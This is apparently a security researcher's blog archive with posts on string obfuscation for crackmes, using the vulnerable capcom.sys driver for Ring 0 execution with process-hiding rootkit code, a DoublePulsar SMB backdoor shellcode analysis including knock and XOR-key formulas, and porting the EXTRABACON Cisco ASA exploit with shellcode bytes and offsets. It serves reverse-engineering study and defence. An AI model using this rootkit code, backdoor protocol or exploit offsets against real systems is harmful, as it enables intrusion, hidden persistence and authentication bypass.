I'm preparing a malware reverse engineering class and building some crackmes for the CTF. I needed to encrypt/obfuscate flags so that they don't just show up with a strings tool. Sure you can crib the assembly and rig this out pretty easily, but the point of these challenges is to instead solve them through behavioral analysis rather than initial assessment. I'm sure this tool will also be good for getting some dirty strings past AV.

Sadly, I'm still not satisfied with the state of C++17 template magic for compile-time string obfuscation or I wouldn't have had to make this. I remember a website that used to do a similar thing for free but at some point it moved to a pay model. I think maybe it had a few extra features?

This instruments pretty nicely though in that an ADD won't be immediately followed by a SUB, which is basically a NOP. Same with XOR, SHIFT, etc. It can also MORPH the output even more by using the current string iteration in the arithmetic to add entropy.

Only ASCII/ANSI is supported because if there's one thing I dislike more than JavaScript it's working with UCS2-LE encodings. And the only language it generates is raw C/C++ because those are the languages you would most likely need something like this for. Post a comment if there's a bug, and feel free to rip the code out if you want to.

Saturday, July 1, 2017

Puppet Strings - Dirty Secret for Windows Ring 0 Code Execution

Update July 3, 2017: FuzzySec has also previously written some info about this.

Ever since I began reverse engineering Shadow Brokers dumps [1] [2] [3], I've gotten into the habit of codenaming my projects. This trick is called Puppet Strings, and it lets you hitch a free ride into Ring 0 (kernel mode) on Windows.

Some nation-state malware, such as Backdoor.Remsec by the ProjectSauron/Strider APT and Trojan.Turla by the Turla APT, performs a similar operation. However, the traditional nation-state modus operandi involves 0-day exploitation.

But why waste 0-days when you can use kn0wn-days?

Premise

If you're running as an elevated admin, you're allowed to load (signed) drivers.
- Local users are almost always admins.
- UAC is known to be fundamentally broken.
Load any (signed) driver with a kn0wn code execution vulnerability and exploit it.
- It's a fairly obvious idea, and elementary to perform.
- Windows does not have robust certificate revocation.
  - Thus, the DSE trust model is fundamentally broken!

Ordinarily, Ring 0 is forbidden unless you have an approved Extended Validation (EV) Code-Signing Certificate (out of reach for most, especially for malicious purposes). There is a "Driver Signature Enforcement" (DSE) security feature present in all modern 64-bit versions of Windows.

This enforcement can only be "officially" bypassed in two ways: attaching a kernel debugger or configuration at the advanced boot options menu. While these are common procedures for driver developers, they are highly-atypical actions for the average user.

That's right, I'm talking about simply loading high-profile vulnerable drivers like capcom.sys:

oh dear god this capcom.sys has an ioctl that disables smep and calls a provided function pointer, and sets SMEP back what even pic.twitter.com/jBCXO7YtNe
— slipstream/RoL (@TheWack0lian) September 23, 2016

Originally introduced in September 2016 as a form of video game anti-cheat, it was quickly discovered that the capcom.sys driver has an ioctl which disables Supervisor Mode Execution Prevention (SMEP) and executes a provided Ring 3 (user mode) function pointer with Ring 0 privileges. It's even kind enough to pass you a function pointer to MmGetSystemRoutineAddress(), which is basically like GetProcAddress() but for ntoskrnl.exe exports.

The unfortunate part is it can still be easily loaded and exploited to this day.

My opinion: file reputation for signed binaries should factor in cert validity period, revocation, digest algorithm, and file prevalence.
— Matt Graeber (@mattifestation) June 24, 2017

If a driver is signed with a valid timestamp, it also doesn't matter if the certificate has expired, as long as it isn't revoked. This trick is only possible because the Microsoft and root CA mechanisms for revoking driver signatures seem bad. This halfhearted approach violates the trust model that public key infrastructure is supposed to be built upon, as defined in the X.509 standard. Perhaps like UAC it is not a security boundary?

Capcom.sys has been around for almost a year, and is easily one of the most well-known and simplest driver exploits of all time.

While this driver is flagged 15/61 on VirusTotal, I have a personal list of known-vulnerable drivers that are 0/61 detection. They aren't too hard to find if you keep your eyes open to netsec news.

Proof of Concept

Code is available on GitHub at zerosum0x0/puppetstrings. To run it, you will need to independently obtain the capcom.sys driver (I don't want to deal with weird licensing issues).

Test system was Windows 10 x64 Redstone 3 (Insider pre-release), just to show the new Driver Signing Policies (and its list of exceptions) introduced in Redstone 1 do not address this issue. This works on all versions of Windows if you update the EPROCESS.ActiveProcessLinks offset.

1: kd> dt !_EPROCESS ActiveProcessLinks
   +0x2e8 ActiveProcessLinks : _LIST_ENTRY

For the PoC, I had to do something relatively malicious to get the point across. Getting to Ring 0 with this technique is simple; doing something interesting once there is more difficult (e.g. we can already load drivers, and the usual SYSTEM shell can be obtained through less dangerous methods).

I load capcom.sys, pass it a function which performs the old rootkit technique of unlinking the current process from the EPROCESS.ActiveProcessLinks circularly-linked list, and then unload capcom.sys. This methodology is instant and makes the current process not show up in user mode tools like tasklist.exe.

static void rootkit_unlink(PEPROCESS pProcess)
{
 /* EPROCESS.ActiveProcessLinks offset on Windows 10 RS3 x64 (see dt output above) */
 static const DWORD WIN10_RS3_OFFSET = 0x2e8;

 PLIST_ENTRY plist =
  (PLIST_ENTRY)((LPBYTE)pProcess + WIN10_RS3_OFFSET);

 /* Splice this entry out: its neighbors now point at each other */
 plist->Blink->Flink = plist->Flink;
 plist->Flink->Blink = plist->Blink;

 /* Point the entry at itself so later list operations on it stay safe */
 plist->Flink = plist;
 plist->Blink = plist;
}
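To make the pointer juggling easier to follow, here is a small Python model of the same unlink. ListEntry, insert_tail(), walk() and the process names are made up for illustration; only the four pointer writes in unlink() mirror the C above. It is a sketch of the data structure, not kernel code.

```python
class ListEntry:
    """Toy stand-in for the kernel's LIST_ENTRY (Flink/Blink pair)."""
    def __init__(self, name):
        self.name = name
        self.flink = self  # an empty list head points at itself
        self.blink = self

def insert_tail(head, entry):
    """Link entry in just before head, i.e. at the tail of the circular list."""
    entry.blink = head.blink
    entry.flink = head
    head.blink.flink = entry
    head.blink = entry

def unlink(entry):
    """The same four pointer writes as rootkit_unlink()."""
    entry.blink.flink = entry.flink
    entry.flink.blink = entry.blink
    entry.flink = entry
    entry.blink = entry

def walk(head):
    """Names visible to anything that enumerates the list starting at head."""
    names, cur = [], head.flink
    while cur is not head:
        names.append(cur.name)
        cur = cur.flink
    return names

head = ListEntry("head")
procs = {n: ListEntry(n) for n in ("System", "lsass.exe", "puppet.exe")}
for p in procs.values():
    insert_tail(head, p)

unlink(procs["puppet.exe"])
print(walk(head))  # ['System', 'lsass.exe']
```

The unlinked entry still exists and still runs; it is simply no longer reachable by walking the list, which is all that tools enumerating processes this way rely on.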

Of course, doing this in a modern rootkit is foolish, as PatchGuard has at least 4 different process list checks (CRITICAL_STRUCTURE_CORRUPTION Bug Check Arg4 = 4, 5, 1A, and 1B). But you can get experimental and think of something else cool to do, as you enjoy all of the freedoms Ring 0 brings.

DOUBLEPULSAR showed us there are a lot of creative ideas to run in the kernel, even outside of a driver context. DSEFix exploits the same vulnerable VirtualBox driver used by Trojan.Turla to disable Driver Signature Enforcement entirely. It's even possible to use some undocumented features to create a reflectively-loaded driver, if one were so inclined...

If you want to learn more about techniques like this, come to the Advanced Windows Post-Exploitation / Malware Forward Engineering DEF CON 25 workshop.

Friday, April 21, 2017

DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis

One week ago today, the Shadow Brokers (an unknown hacking entity) leaked the Equation Group's (NSA) FuzzBunch software, an exploitation framework similar to Metasploit. In the framework were several unauthenticated, remote exploits for Windows (such as the exploits codenamed EternalBlue, EternalRomance, and EternalSynergy). Many of the vulnerabilities that are exploited were fixed in MS17-010, perhaps the most critical Windows patch in almost a decade.

Side note: You can use my MS17-010 Metasploit auxiliary module to scan your networks for systems missing this patch (uncredentialed and non-intrusive). If a missing patch is found, it will also check for an existing DoublePulsar infection.

Introduction

For those unfamiliar, DoublePulsar is the primary payload used in SMB and RDP exploits in FuzzBunch. Analysis was performed using the EternalBlue SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64.

The shellcode, in tl;dr fashion, essentially performs the following:

Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
Step 2: Reads ntoskrnl.exe's exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocatePool/ExFreePool/ZwQuerySystemInformation functions.
Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemModuleInformation, which returns a list of all loaded drivers. It uses this to locate Srv.sys, an SMB driver.
Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you "knock" correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. "Burning" DoublePulsar doesn't completely erase the hook function from memory, just makes it dormant.

After exploitation, you can see the missing symbol in the SrvTransaction2DispatchTable. There are supposed to be 2 handlers here with the SrvTransactionNotImplemented symbol. This is the DoublePulsar backdoor (array index 14):

Honestly, you don't usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn't see many details about it outside of Countercept's analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup in the EternalBlue exploit with the IA32_LSTAR syscall MSR (0xc0000082) and a region of the Srv.sys containing FEFEs, but I will instead focus on just the raw DoublePulsar methodology... Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

Detailed Shellcode Analysis

Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

Step 0: Determine CPU Architecture

The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

Here is how x86 sees the first few bytes.

You'll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

And here is how x64 sees it:

The inc eax byte is instead a REX prefix for the NOP that follows, so the zero flag is still set from the xor eax, eax operation and the je is taken. Since x64 has RIP-relative addressing it doesn't need to get the RIP register.

The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

Step 1: Find ntoskrnl.exe Base Address

Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Processor Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

This code grabs offset 0x38 of the KPCR, which is the "IdtBase" and contains a pointer to an array of KIDTENTRY64 structs. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

At offset 4 into the KIDTENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).
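The backwards page scan can be sketched in a few lines of Python. This is only a model: the bytearray stands in for kernel memory, and find_image_base(), the mapped address and the handler offset are invented for the example. The real shellcode does the same walk with raw pointers.

```python
PAGE_SIZE = 0x1000

def find_image_base(memory, address):
    """Walk backwards one page at a time until a page starts with 'MZ'."""
    page = address & ~(PAGE_SIZE - 1)        # round down to a page boundary
    while page >= 0:
        if memory[page:page + 2] == b"MZ":   # the bytes 4d 5a, i.e. word 0x5a4d
            return page
        page -= PAGE_SIZE
    return None

# Fake "kernel memory": an image mapped at page 3, with an interrupt
# handler living 0x2345 bytes into it.
memory = bytearray(16 * PAGE_SIZE)
image_base = 3 * PAGE_SIZE
memory[image_base:image_base + 2] = b"MZ"
handler = image_base + 0x2345

print(hex(find_image_base(memory, handler)))  # 0x3000
```

The scan only works because PE images are mapped on page boundaries, so the header can never sit in the middle of a page.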

Step 2: Locate Necessary Function Pointers

Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.
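As a rough illustration of hash-based lookup, here is a Python sketch. The hash shown is the ROR-13 additive hash common in user-mode shellcode; it is a stand-in, since the exact algorithm DoublePulsar uses is not covered here. The export table and its RVAs are made up.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    return ((value >> count) | (value << (32 - count))) & 0xffffffff

def name_hash(name):
    """ROR-13 additive hash; a stand-in, not DoublePulsar's actual algorithm."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xffffffff
    return h

def resolve(exports, wanted_hash):
    """Return the RVA of the first export whose name hashes to wanted_hash."""
    for name, rva in exports.items():
        if name_hash(name) == wanted_hash:
            return rva
    return None

# Hypothetical export table: name -> RVA (values are invented)
exports = {
    "ExAllocatePool": 0x1000,
    "ExFreePool": 0x2000,
    "ZwQuerySystemInformation": 0x3000,
}

# The shellcode carries only this constant, never the string itself
WANTED = name_hash("ZwQuerySystemInformation")
print(hex(WANTED), resolve(exports, WANTED))
```

Carrying a 4-byte constant per function keeps the payload small and avoids leaving readable API names in the shellcode.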

The following functions are found:

ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

Step 3: Locate Srv.sys SMB Driver

One of the information classes accepted by ZwQuerySystemInformation is SystemModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

The shellcode then searches this list for two different hashes, and lands on Srv.sys, which is one of the main drivers that SMB runs on.

The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

Step 4: Patch the SMB Trans2 Dispatch Table

Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

Inside of the .data section is generally global read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

The shellcode allocates some memory and copies over the code for its function hook.

Next the shellcode stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.
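The save-then-overwrite pattern is easier to see in a toy model. In the Python sketch below the dispatch table is a plain list and every slot starts out as "not implemented", which is a simplification. install_hook(), is_knock and handle_knock are hypothetical names, and the knock check is a placeholder rather than the real protocol.

```python
def srv_transaction_not_implemented(request):
    return "STATUS_NOT_IMPLEMENTED"

# Toy dispatch table; in this model every slot starts as "not implemented"
dispatch_table = [srv_transaction_not_implemented] * 16
HOOK_INDEX = 14

def install_hook(table, index, is_knock, handle_knock):
    original = table[index]          # saved so the hook can forward to it
    def hook(request):
        if is_knock(request):
            return handle_knock(request)
        return original(request)     # everything else behaves as before
    table[index] = hook
    return original

install_hook(
    dispatch_table, HOOK_INDEX,
    is_knock=lambda req: req.get("knock") is True,   # placeholder check
    handle_knock=lambda req: "BACKDOOR_HANDLED",
)

print(dispatch_table[14]({"knock": True}))   # BACKDOOR_HANDLED
print(dispatch_table[14]({"knock": False}))  # STATUS_NOT_IMPLEMENTED
```

Because unrecognized requests fall through to the saved original, a client that doesn't know the knock sees exactly the behavior it saw before the hook was installed.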

That's it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

Step 5: Send "Knock" and Raw Shellcode

Now when DoublePulsar sends its specific "knock" requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a delta, which serves as a status code.

These operations are hidden in plain sight via a form of steganography, and Wireshark has no dissector that decodes them.

The status codes (via MultiplexID delta) are:

0x10 = success
0x20 = invalid parameters
0x30 = allocation failure
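A detection script could read the status back out like this. It is a minimal sketch: backdoor_status() is a name I made up and the MultiplexID values are arbitrary; the only protocol fact relied on is that MultiplexID is a 16-bit field in the SMB header.

```python
STATUS_BY_DELTA = {
    0x10: "success",
    0x20: "invalid parameters",
    0x30: "allocation failure",
}

def backdoor_status(request_mid, response_mid):
    """Map the MultiplexID delta to a status string, or None if there is no match."""
    delta = (response_mid - request_mid) & 0xffff   # MultiplexID is 16 bits wide
    return STATUS_BY_DELTA.get(delta)

print(backdoor_status(0x41, 0x51))  # success
print(backdoor_status(0x41, 0x41))  # None, the response echoes the request as usual
```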

The opcode list is as follows:

0x23 = ping
0xc8 = exec
0x77 = kill

You can tell which opcode was called by using the following algorithm:

t = SMB.Trans2.Timeout
op = (t) + (t >> 8) + (t >> 16) + (t >> 24);

Conversely, you can make the packet using this algorithm, where k is randomly generated:

op = 0x23
k = 0xdeadbeef
t = 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
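Both directions can be checked against each other in Python. The function names are mine, and the final & 0xff in decode_opcode() is an assumption: the pseudocode above omits it, but the opcode is a single byte, so only the low byte of the sum can matter.

```python
def decode_opcode(t):
    """Sum the four bytes of the Trans2 Timeout field, keeping the low byte."""
    return (t + (t >> 8) + (t >> 16) + (t >> 24)) & 0xff

def encode_timeout(op, k):
    """Build a Timeout value whose bytes sum to op, using k as random filler."""
    filler = k & 0xffff00                      # bytes 1 and 2 are taken from k
    low = (op - (filler >> 16) - ((filler >> 8) & 0xff)) & 0xff
    return low | filler

t = encode_timeout(0x23, 0xdeadbeef)
print(hex(t), hex(decode_opcode(t)))  # 0xadbeb8 0x23
```

The low byte is simply chosen so that the byte sum lands on the opcode, which is why any k produces a valid packet for the same operation.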

Sending a ping opcode in a Trans2 SESSION_SETUP request will yield a response that holds part of a XOR key that needs to be calculated for exec requests.

The "XOR key" algorithm is:

s = SMB.Signature1
x = 2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))
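The expression carries over to Python almost verbatim. The one thing to add is a 32-bit truncation, since Python integers don't overflow the way a 32-bit register does. xor_key() is my own name for it, and the input value is arbitrary.

```python
def xor_key(s):
    """Derive the 32-bit XOR key from the SMB signature value s."""
    x = 2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))
    return x & 0xffffffff   # Python ints are unbounded, so truncate to 32 bits

print(hex(xor_key(1)))  # 0x1000002
```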

More shellcode can be sent with a Trans2 SESSION_SETUP request and exec opcode. The shellcode is sent in the "data payload" part of the packet 4096 bytes at a time, using the XOR key as a basic stream cipher. The backdoor will allocate an executable region of memory, decrypt and copy over the shellcode, and run it. The Inject DLL payload is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

We can see the hook is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

And of course the full disassembly listing.

Conclusion

There you have it, a highly sophisticated, multi-architecture SMB backdoor. The world probably did not need a remote Windows kernel payload this advanced being spammed across the Internet. It's a unique payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard. It is unclear if newer versions of PatchGuard, such as those in Windows 10, already detect this hook. If not, we can expect such a check to be added.

Usually we only get to see kernel shellcode in local exploits, as it swaps process tokens in order to privilege escalate. However, Microsoft does many networking things in the kernel, such as Srv.sys and HTTP.sys. The techniques demonstrated are in many ways completely analogous to how usermode shellcode operates during remote exploits.

If/when this gets ported over to Metasploit, I would probably not copy this verbatim, and rather skip the backdoor idea. It isn't the most secure thing to do, as it's not a big secret anymore and anyone else can come along and use your backdoor.

Here's what can be done instead:

Obtain ntoskrnl.exe address in the same fashion as DoublePulsar, and read export directory for necessary functions to perform the next operations.
Spawn a hidden process (such as notepad.exe).
Queue an APC with Meterpreter payload.
Resume process, and exit the kernel cleanly.

Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges. It does not open new ports, or have any real encryption or other features to prevent others from taking advantage of the same hole, making the attribution game for digital forensic investigators even more difficult. This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.

Saturday, September 17, 2016

Reverse Engineering Cisco ASA for EXTRABACON Offsets

Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

Background
Understanding the Exploit
Finding Offsets
Improving the Shellcode
Future Work

Background

On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (e.g. ASLR, stack canaries) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs, one running version 8.4(3) (which had EXTRABACON exploit code), and one running version 9.2(3), which we would target to write new code.

This blog post will explain the methodology for the following submissions to exploit-db.com:

There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code; however, the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing over 200 bytes to 1 stage of 69 bytes.

Understanding the Exploit

Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, exploitation is pretty much guaranteed with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

Hijacking Execution

The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

In the shellcode_asa843.py file, the first interesting thing to see is:

my_ret_addr_len = 4
my_ret_addr_byte = "\xc8\x26\xa0\x09"
my_ret_addr_snmp = "200.38.160.9"

This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

Stage 1: "Finder"

The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.

finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"

This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.
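The _byte and _snmp variables shown so far hold the same data in two encodings: raw bytes, and a dotted-decimal string with one number per byte, presumably because the overflow data travels as the sub-identifiers of an SNMP OID. A quick Python check, where to_snmp() is a helper I made up:

```python
import struct

def to_snmp(raw):
    """Render bytes in the dotted-decimal form used by the *_snmp variables."""
    return ".".join(str(b) for b in raw)

ret_addr = struct.pack("<I", 0x09a026c8)        # little-endian, as x86 stores it
finder = bytes.fromhex("8b7c24148b07ffe090")    # same bytes as finder_byte

print(to_snmp(ret_addr))  # 200.38.160.9
print(to_snmp(finder))    # 139.124.36.20.139.7.255.224.144
```

This is handy when porting: once you have a new address, packing it little-endian and joining the bytes with dots gives the string form directly.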

Stage 2: "Preamble"

Observing the main Python source code, we can see how the second stage is made:

        wrapper = sc.preamble_snmp
        if self.params.msg:
            wrapper += "." + sc.successmsg_snmp
        wrapper += "." + sc.launcher_snmp
        wrapper += "." + sc.postscript_snmp

Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

It seems like a lot is going on here, but it's pretty simple.

A "safe" return address is XORed by 0xa5a5a5a5
- Unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
The fixed registers are saved (PUSHA = push all)
A pointer to the third stage "payload" (to be discussed soon) is found on the stack
- This offset gave us trouble. Luckily our improved shellcode doesn't need it!
Payload is called, and returns
The saved registers are restored (POPA = pop all)
The shellcode returns execution to the "safe" location, as if nothing happened

I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

Stage 3: "Payload"

The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

Note: this is for payload "pass-disable". There's a second payload, "pass-enable", which re-patches the bytes. So after you log in as admin, you can run a second exploit to clean up your tracks.

For this stage, there is payload_PMCHECK_DISABLE_byte and payload_AAAADMINAUTH_DISABLE_byte. These two shellcodes perform the same overall function, just for different offsets, with a lot of code reuse.

Here is the Equation Group PMCHECK_DISABLE shellcode:

There's some shellcode trickery going on, but here are the steps being taken:

First, the syscall to mprotect() marks a page of memory as read/write/exec, so we can patch the code
Next, we jump forward to right before the end of the shellcode
- The last 3 lines of the shellcode contain the code to "always return true"
The call instruction puts the current address (where patch code is) on the stack
The patch code address is pop'd into esi and we jump backwards
rep movs copies 4 bytes (ecx) from esi (source index) to edi (destination index), then we jump to the admauth() patch

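The following is functionally equivalent C code:

/* Page containing pmcheck(), and the address of pmcheck() itself */
void *const PMCHECK_BOUNDS = (void *)0x954c000;
uint32_t *const PMCHECK_OFFSET = (uint32_t *)0x954cfd0;

/* Little-endian dword holding the replacement instructions */
const uint32_t PMCHECK_BYTES = 0xc340c031;

sys_mprotect(PMCHECK_BOUNDS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
*PMCHECK_OFFSET = PMCHECK_BYTES;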

In this case, PMCHECK_BYTES will be "always return true".

xor eax, eax   ; set eax to 0  -- 31 c0
inc eax        ; increment eax -- 40
ret            ; return        -- c3
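The constant 0xc340c031 looks backwards compared to the opcode bytes because x86 stores dwords little-endian. A short Python check of that, under no assumptions beyond the values already shown:

```python
import struct

PMCHECK_BYTES = 0xc340c031
raw = struct.pack("<I", PMCHECK_BYTES)   # how the dword is laid out in memory

print(raw.hex(" "))  # 31 c0 40 c3
```

Read left to right, those are the bytes for xor eax, eax (31 c0), inc eax (40) and ret (c3).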

Yes, my friends who are fluent in shellcode, the assembly is extremely verbose just to write 4 bytes to a memory location. Here is how we summarized everything from loc_00000025 to the end in the improved shellcode:

mov dword [PMCHECK_OFFSET], PMCHECK_BYTES

In the inverse operation, pass-enable, we will simply patch the bytes to their original values.

Finding Offsets

So now that we've reverse engineered the shellcode, we know what offsets we need to patch to port the exploit to a new Cisco ASA version:

The RET smash, which should be JMP ESP (ff e4) bytes
The "safe" return address, to continue execution after our shellcode runs
The address of pmcheck()
The address of admauth()

RET Smash

We can set the RET smash address to anywhere JMP ESP (ff e4) opcodes appear in an executable section of the binary. There is no shortage of the actual instruction in 9.2(3).

Any of these will do, so we just picked a random one.
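If you would rather script the search than eyeball a disassembly, something like the following works as a starting point. The byte blob is invented and find_all() is my own helper. A real search would read only the executable sections of lina and add each section's load address to the offsets found.

```python
def find_all(blob, needle):
    """Return every offset at which needle occurs in blob (overlaps included)."""
    offsets, start = [], 0
    while True:
        hit = blob.find(needle, start)
        if hit == -1:
            return offsets
        offsets.append(hit)
        start = hit + 1

JMP_ESP = b"\xff\xe4"
blob = b"\x90\x90\xff\xe4\xc3\x31\xc0\xff\xe4"   # made-up bytes, not from lina

print(find_all(blob, JMP_ESP))  # [2, 7]
```

Note that a byte-level search also finds ff e4 sequences that straddle other instructions, which is fine here since the CPU will decode them as JMP ESP when jumped to directly.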

Safe Return Address

This is the location to safely return execution to after the shellcode runs. As mentioned, this part of the code isn't actually recognized as a function by IDA, and also the same trick we'll use for the Authentication Functions (searching the assembly with ROPgadget) doesn't work here.

The offset in 8.4(3) is 0xad457e33 ^ 0xa5a5a5a5 = 0x8e0db96

This contains a very unique signature of common bytes we can grep for in 9.2(3).

Our safe return address offset is at 0x9277386.
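The 8.4(3) arithmetic is easy to double-check. The sketch below only restates the XOR from above; unmask() is a name I picked.

```python
MASK = 0xa5a5a5a5

def unmask(value):
    """XOR is its own inverse, so this both masks and unmasks."""
    return value ^ MASK

print(hex(unmask(0xad457e33)))  # 0x8e0db96
```

Going the other way, unmask(0x8e0db96) gives back 0xad457e33, which is the form the original exploit code expects for a new safe return address.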

Authentication Functions

Finding the offsets for pmcheck() and admauth() is pretty simple. The offsets in 8.4(3) are not XORed by 0xa5a5a5a5, but the page alignment for sys_mprotect() is.

We'll dump the pmcheck() function from 8.4(3).

We have the bytes of the function, so we can use the Python ROPGadget tool from Jonathan Salwan to search for those bytes in 9.2(3).

It's a pretty straightforward process, which can be repeated for admauth() offsets. Note that during this process, we get the unpatch bytes needed for the pass-enable shellcode.

Finding the page alignment boundaries for these offsets (for use in sys_mprotect()) is easy as well, just floor to the nearest 0x1000.
